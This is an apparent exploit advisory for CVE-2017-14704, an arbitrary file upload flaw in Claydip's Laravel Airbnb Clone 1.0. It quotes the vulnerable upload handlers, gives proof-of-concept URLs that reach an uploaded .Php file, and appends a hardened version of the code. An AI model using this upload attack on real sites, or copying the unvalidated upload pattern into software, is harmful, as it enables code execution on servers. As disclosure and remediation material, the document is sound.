# # # # #
# Exploit Title: Claydip Laravel Airbnb Clone 1.0 - Arbitrary File Upload
# Dork: N/A
# Date: 22.09.2017
# Vendor Homepage: https://www.claydip.com/
# Software Link: https://www.claydip.com/airbnb-clone.html
# Demo: https://www.claydip.com/airbnb_demo.html
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-14704
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
#
# The vulnerability allows a user to upload arbitrary files.
#
# Vulnerable Source:
#
# .............1
#public function imageSubmit(Request $request)
#{
#    $this->validate($request, [
#        'image' => 'image|mimes:jpeg,png,jpg,gif,svg|max:2048',
#    ]);
#    if ($request->hasFile('profile_img_name')) {
#        $file = $request->file('profile_img_name');
#        //getting timestamp
#        $timestamp = str_replace([' ', ':'], '-', Carbon::now()->toDateTimeString());
#        $img_name = $timestamp. '-' .$file->getClientOriginalName();
#        //$image->filePath = $img_name;
#        $file->move(public_path().'/images/profile', $img_name);
#        $postData = array('profile_img_name' => $img_name, 'profile_photo_approve' => 0);
#        $user = $this->userRepository->updateUser($postData);
#        flash('Profile Image Updated Successfully', 'success');
#        if($request->get('uploadpage') == 2) {
#            return \Redirect::to('user/edit/uploadphoto');
#        }
#        return \Redirect::to('user/dashboard');
#    }
#
#}
# .............2
#public function proof_submit(Request $request)
#{
#    if ($request->hasFile('profile_img_name')) {
#        $file = $request->file('profile_img_name');
#        //getting timestamp
#        $timestamp = str_replace([' ', ':'], '-', Carbon::now()->toDateTimeString());
#        $img_name = $timestamp. '-' .$file->getClientOriginalName();
#        //$image->filePath = $img_name;
#        $file->move(public_path().'/images/proof', $img_name);
#        $postData = array('idproof_img_src' => $img_name, 'id_proof_approved' => 0);
#        $user = $this->userRepository->updateUser($postData);
#        flash('Proof Updated Successfully', 'success');
#        return \Redirect::to('user/edit/uploadproof');
#    }
#
#}
# .............
#
# Proof of Concept:
#
# http://localhost/[PATH]/user/edit/uploadphoto
# http://localhost/[PATH]/user/edit/uploadproof
#
# http://localhost/[PATH]/images/profile/[$timestamp].Php
#
# Etc..
# # # # #
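
A hardened form of imageSubmit() for comparison, added here as an example; it is not the vendor's patch and not part of the original advisory. In the source above the validation rule is keyed on 'image' while the file is read from 'profile_img_name', so the uploaded file is never validated, and the stored name is built from getClientOriginalName(). Assumptions: the controller class name UserController is hypothetical, $this->userRepository and flash() behave as in the original code, and the application runs Laravel 5.3 or later (needed for hashName()).

```php
<?php
// Added example: hardened variant of imageSubmit(); not the vendor's fix.

namespace App\Http\Controllers;

use Illuminate\Http\Request;

// Assumption: class name is hypothetical; $this->userRepository is
// injected the same way as in the original controller.
class UserController extends Controller
{
    public function imageSubmit(Request $request)
    {
        // Validate the field that is actually read below. 'required|file'
        // makes a missing or failed upload a validation error, and 'mimes'
        // checks the type guessed from the file contents, not the name.
        // SVG is left out of the allow-list in this example because it can
        // embed script; that is a choice made here, not taken from the page.
        $this->validate($request, [
            'profile_img_name' => 'required|file|mimes:jpeg,png,jpg,gif|max:2048',
        ]);

        $file = $request->file('profile_img_name');

        // hashName() returns a random name with an extension guessed from
        // the content, so the client-supplied name (and any ".Php" suffix)
        // never reaches the filesystem.
        $img_name = $file->hashName();
        $file->move(public_path('images/profile'), $img_name);

        $this->userRepository->updateUser([
            'profile_img_name'      => $img_name,
            'profile_photo_approve' => 0,
        ]);
        flash('Profile Image Updated Successfully', 'success');

        return $request->get('uploadpage') == 2
            ? \Redirect::to('user/edit/uploadphoto')
            : \Redirect::to('user/dashboard');
    }
}
```

The same two changes (validate the field that is read, generate the stored name server-side) apply to proof_submit(), which has no validation call at all.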